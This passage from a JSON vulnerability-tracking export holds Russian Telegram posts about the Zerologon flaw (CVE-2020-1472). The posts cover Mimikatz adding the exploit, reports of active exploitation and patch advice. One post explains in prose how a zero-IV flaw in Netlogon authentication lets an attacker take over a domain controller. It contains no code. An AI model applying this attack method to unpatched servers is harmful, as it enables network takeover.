\u043f\u0440\u0438\u043a\u0440\u0443\u0442\u0438\u043b \u0432 Mimikatz \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 Zerologon. \n\n\u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 Mimikatz \u0438\u043c\u0435\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0435 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0438, \u0441\u043a\u043e\u0440\u043e \u0432\u0441\u0435-\u0432\u0441\u0435 \u043c\u0430\u043c\u043a\u0438\u043d\u044b \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0443\u0447\u0430\u0442\u0441\u044f \u0431\u043e\u043c\u0431\u0438\u0442\u044c \u0441\u0435\u0442\u0438 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows Server.\n\n\u0415\u0441\u043b\u0438 \u0431\u044b \u0414\u0435\u043b\u043f\u0438 \u0441\u0434\u0435\u043b\u0430\u043b \u044d\u0442\u043e \u0434\u043e \u0432\u044b\u0445\u043e\u0434\u0430 \u043f\u0430\u0442\u0447\u0430 Microsoft, \u0442\u043e \u043c\u044b \u0431\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u0435\u0433\u043e (\u0438 \u044d\u0442\u043e \u0435\u0449\u0435 \u043c\u044f\u0433\u043a\u043e) \u043d\u0435\u0433\u043e\u0434\u044f\u0435\u043c. \u0421\u0435\u0439\u0447\u0430\u0441 \u0436\u0435 \u0411\u0435\u043d\u0434\u0436\u0430\u043c\u0438\u043d \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u0432 \u0440\u043e\u043b\u0438 \u0441\u0430\u043d\u0438\u0442\u0430\u0440\u0430 \u043b\u0435\u0441\u0430 - \u0432\u044b\u0436\u0438\u0432\u0443\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0438\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0435. \u0421\u0443\u0440\u043e\u0432\u043e, \u043d\u043e \u0442\u0430\u043a\u043e\u0432\u0430 \u0436\u0438\u0437\u043d\u044c \u0438\u043d\u0444\u043e\u0441\u0435\u043a\u0430. \u041e\u0445\u043e\u0442\u0430 \u043d\u0430 \u0434\u044f\u0442\u043b\u043e\u0432 \u043e\u0431\u044a\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0439!", "creation_timestamp": "2020-09-16T14:48:00.000000Z"}, {"uuid": "14e604e4-e430-4dc4-8663-240d2ce83760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/0vZqUc7_DNu-pgRIOwk91_AhN3qHmSP4_uy4v4-hV_gZFA", "content": "", "creation_timestamp": "2020-10-11T04:50:18.000000Z"}, {"uuid": "c7b79268-1f5a-40c3-a4b4-269dce360f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/DIFndr5_kT1gv9_ye4a4QhDIX4iiu14XmmAF7D7NJ1dKeA", "content": "", "creation_timestamp": "2020-09-23T14:02:01.000000Z"}, {"uuid": "272cd296-7866-4ab1-a3d3-a5f9e31526dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/true_secator/930", "content": "\u0411\u043e\u043b\u044c\u0448\u043e\u0439 \u0448\u0443\u043c \u043f\u043e\u0434\u043d\u044f\u043b\u0441\u044f \u0432 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 \u043f\u043e\u0441\u043b\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0433\u043e\u043b\u043b\u0430\u043d\u0434\u0441\u043a\u043e\u0439 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Secure BV \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u043e\u0439 Microsoft \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u043e\u0432\u0441\u043a\u043e\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0439 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Zerologon.  \n\n\u0425\u043e\u0442\u044f \u0440\u0430\u043d\u0435\u0435 \u0438 \u0431\u044b\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 10 \u0438\u0437 10  \u043f\u043e \u0448\u043a\u0430\u043b\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u0438 \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 Netlogon, \u0441\u043b\u0443\u0436\u0431\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 Windows Server, \u043f\u043e\u043b\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043d\u0435 \u0431\u044b\u043b\u043e. \u041e\u043d\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0432\u0441\u0435\u0445 \u043d\u0430 \u0443\u0448\u0438.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0435 \u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 Netlogon Remote Protocol. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0435\u0431\u044f \u0437\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0432 \u0441\u0435\u0442\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0441\u0430\u043c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Netlogon \u0438 \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c \u0432 Active Directory. \n\n\u0412 \u0447\u0435\u043c \u0436\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0430\u0441\u044c \u043e\u0448\u0438\u0431\u043a\u0430? \u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f AES-CFB8 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 ComputeNetlogonCredential, \u0433\u0434\u0435 \u0432\u0435\u043a\u0442\u043e\u0440 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 (IV) \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0438 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 16 \u043d\u0443\u043b\u0435\u0432\u044b\u0445 \u0431\u0430\u0439\u0442\u043e\u0432, \u0445\u043e\u0442\u044f \u043f\u043e \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u043d \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u043c. \u0412 \u0438\u0442\u043e\u0433\u0435 \u0434\u043b\u044f 1 \u0438\u0437 256 \u043a\u043b\u044e\u0447\u0435\u0439 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u0432\u0432\u043e\u0434\u0443, \u0441\u043e\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0438\u0437 \u0432\u0441\u0435\u0445 \u043d\u0443\u043b\u0435\u0439, \u0434\u0430\u0441\u0442 \u0442\u0430\u043a\u043e\u0439 \u0436\u0435 \u043d\u0443\u043b\u0435\u0432\u043e\u0439 \u0432\u044b\u0432\u043e\u0434.\n\n\u0427\u0435\u043c \u0436\u0435 \u044d\u0442\u043e \u043f\u043b\u043e\u0445\u043e? \u0410 \u0442\u0435\u043c, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440, \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u043f\u043e\u0434\u0440\u044f\u0434 (\u0441\u0440\u0435\u0434\u043d\u0435\u0435 \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0440\u0430\u0432\u043d\u044f\u0435\u0442\u0441\u044f 256), \u043c\u043e\u0436\u0435\u0442 \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u0434\u0438\u043d \u0438\u0437 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0445 \u0435\u0433\u043e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432, ClientCredential, \u0432\u044b\u0447\u0438\u0441\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0440\u0430\u0437 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ComputeNetlogonCredential. \u0422\u043e \u0435\u0441\u0442\u044c \u0432 \u0441\u0440\u0435\u0434\u043d\u0435\u043c \u0432 1 \u0438\u0437 256 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u0440\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0438\u0437 8 \u043d\u0443\u043b\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u043e\u0436\u0438\u0434\u0430\u0442\u044c ClientCredential \u0442\u0430\u043a\u0436\u0435 \u0438\u0437 8 \u043d\u0443\u043b\u0435\u0439.\n\n\u0410 \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043d\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0432\u0435\u0440\u043d\u043e\u0433\u043e \u043e\u0442\u0432\u0435\u0442\u0430, \u0442\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043d\u0430\u043f\u0438\u0445\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0443 8 \u043d\u0443\u043b\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0439\u043c\u0435\u0442 \u043e\u043a\u043e\u043b\u043e 3 \u0441\u0435\u043a\u0443\u043d\u0434, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u0440\u043e\u0439\u0434\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \n\n\u0412 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0445\u0430\u043a\u0435\u0440 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043c\u0435\u0442 \u0435\u0449\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0442\u0440\u044e\u043a\u043e\u0432, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e ComputeNetlogonCredential, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u043e \u0432\u0437\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 \u043f\u043e\u0434 \u0441\u0432\u043e\u044e \u0432\u043b\u0430\u0441\u0442\u044c.\n\n\u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 - \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u0442\u044c \u0435\u0435 \u0438\u0437\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438, \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0432 \u043e\u0434\u043d\u0443 \u0438\u0437 \u043c\u0430\u0448\u0438\u043d. \u041d\u043e \u044d\u0442\u043e \u0437\u0430\u0434\u0430\u0447\u0430 \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0440\u0435\u0448\u0430\u0435\u043c\u0430\u044f.\n\n\u0412\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 Microsoft \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 \u043f\u0430\u0442\u0447 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0443 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Zerologon, \u0434\u0435\u043b\u0430\u044f \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 NRPC \u0442\u0440\u0430\u043d\u0441\u043f\u043e\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0433 \u043e\u0431\u043e\u0439\u0442\u0438, \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0432 \u0435\u0433\u043e \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b \u043a\u043b\u0438\u0435\u043d\u0442\u0430 (\u0442\u0430\u043a\u043e\u0435 \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u043b\u043e\u0441\u044c). \n\n\u0418\u043d\u0444\u043e\u0441\u0435\u043a \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u0438\u0437\u043d\u0430\u044e\u0442 Zerologon \u0432\u0435\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0438 \u043e\u0447\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e - \"This is really scary\". \u0427\u0442\u043e\u0431\u044b \u043d\u0435 \u0431\u044b\u043b\u043e \"scary\" \u043d\u0430\u0434\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0430\u043f\u0434\u0435\u0439\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u0438 Windows Server.", "creation_timestamp": "2020-09-14T16:57:49.000000Z"}, {"uuid": "eb2fe7e0-a1c3-4ff5-a63b-db2d4598d249", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/true_secator/969", "content": "Microsoft Security Intelligence \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u044f\u043c\u043e \u0441\u0435\u0439\u0447\u0430\u0441 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u043f\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472 aka Zerologon. \n\n\u041e\u0431 \u044d\u0442\u043e\u043c, \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u043c\u044b \u0438 \u0433\u043e\u0432\u043e\u0440\u0438\u043b\u0438. \u041a\u0442\u043e \u043d\u0435 \u0443\u0441\u043f\u0435\u043b \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0439 Windows Server - \u043f\u043e\u043b\u0443\u0447\u0438\u0442 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0441\u0435\u0442\u044c.", "creation_timestamp": "2020-09-24T08:36:39.000000Z"}, {"uuid": "b8b3c85a-efe5-45c5-9dd9-8c2e25cca5e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/tomhunter/168", "content": "\u0415\u0441\u043b\u0438 \u0442\u044b \u0441\u0430\u043c\u043e\u0438\u0437\u043e\u043b\u0438\u0440\u0443\u0435\u0448\u044c\u0441\u044f \u0432 \u0441\u0432\u043e\u0435 \u0443\u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u0438\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043a\u0435 \u0441 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0447\u0435\u0439 \u043c\u0430\u0448\u0438\u043d\u043a\u043e\u0439, \u0442\u043e \u043d\u0430\u0432\u0435\u0440\u043d\u044f\u043a\u0430 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0448\u044c \u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u043e\u0431\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u0440\u0430\u0431\u043e\u0442\u043d\u044b\u0435 \u0440\u0438\u0442\u0443\u0430\u043b\u044b \u043b\u043e\u0433\u0438\u043d\u0430 \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0439 \u0434\u043e\u043c\u0435\u043d. \u0410 \u0437\u043d\u0430\u0447\u0438\u0442, \u0442\u0435\u0431\u0435 \u0431\u0443\u0434\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0435\u043d \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432, \u043a\u0430\u043a \u043c\u043e\u0433\u0443\u0442 \u0443\u0432\u0435\u0441\u0442\u0438 \u0442\u0432\u043e\u044e \u0443\u0447\u0435\u0442\u043a\u0443 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u044d\u0442\u043e\u0433\u043e \u043d\u0435\u0445\u0438\u0442\u0440\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430.\n\n\u0415\u0441\u043b\u0438 \u0442\u044b \u0441\u0438\u0434\u0438\u0448\u044c \u0437\u0430 \u0441\u0432\u043e\u0438\u043c \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u0430\u0440\u043c\u043e\u043c, \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0439 \u043f\u043e\u0441\u0442, \u043d\u043e \u043c\u043e\u0436\u0435\u0448\u044c \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u044d\u0442\u043e \u0431\u0435\u0437 \u0443\u0432\u0430\u0436\u0435\u043d\u0438\u044f.\n\n\u041d\u0430\u0447\u043d\u0451\u043c \u0441 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0443\u0447\u0451\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c, \u043f\u043e\u0434 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0442\u044b \u0437\u0430\u0445\u043e\u0434\u0438\u0448\u044c \u043d\u0430 \u0441\u0432\u043e\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440, \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u0432\u0443\u0445 \u0442\u0438\u043f\u043e\u0432. \u0415\u0441\u043b\u0438 \u044d\u0442\u043e \u0442\u0432\u043e\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e, \u0442\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u0438 \u0443\u0447\u0451\u0442\u043a\u0430 \u0443 \u0442\u0435\u0431\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u2014 \u0437\u0430\u0432\u0435\u0434\u0451\u043d\u043d\u0430\u044f \u043f\u0440\u044f\u043c\u043e \u043d\u0430 \u0442\u0432\u043e\u0435\u0439 \u043c\u0430\u0448\u0438\u043d\u043a\u0435. \u0415\u0441\u043b\u0438 \u0436\u0435 \u043b\u043e\u0433\u0438\u043d \u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u0432\u044b\u0434\u0430\u043d\u044b \u0442\u0435\u0431\u0435 \u0432 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0442\u044b \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0448\u044c, \u0442\u043e \u0442\u0430\u043a\u0430\u044f \u0443\u0447\u0451\u0442\u043a\u0430 \u0431\u0443\u0434\u0435\u0442 \u044f\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0439, \u0442\u043e \u0435\u0441\u0442\u044c \u0437\u0430\u0432\u0435\u0434\u0451\u043d\u043d\u043e\u0439 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0440\u0430\u0431\u043e\u0447\u0435\u0439 \u0433\u0440\u0443\u043f\u043f\u044b.\n\n\u0414\u043e\u043c\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0443\u0434\u043e\u0431\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0438\u043c\u0435\u043d\u043d\u043e \u0434\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0438\u0445 \u0441\u0435\u0442\u0435\u0439, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u044b\u0434\u0435\u043b\u044f\u044e\u0442\u0441\u044f \u0446\u0435\u043b\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 (\u043f\u0440\u0438\u0432\u0435\u0442, \u0431\u0435\u0437\u043c\u043e\u043b\u0432\u043d\u044b\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043d\u043e\u0443\u043d\u0435\u0439\u043c\u044b) \u0441 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u041f\u0440\u0438\u0434\u0443\u043c\u0430\u043d \u0442\u0430\u043a\u043e\u0439 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0434\u043b\u044f \u0443\u043f\u0440\u043e\u0449\u0435\u043d\u0438\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. \u0414\u043e\u0431\u0430\u0432\u0438\u043b \u043d\u043e\u0432\u043e\u0433\u043e \u0430\u0434\u043c\u0438\u043d\u0430 \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 \"Admins\", \u0438 \u0432\u0441\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 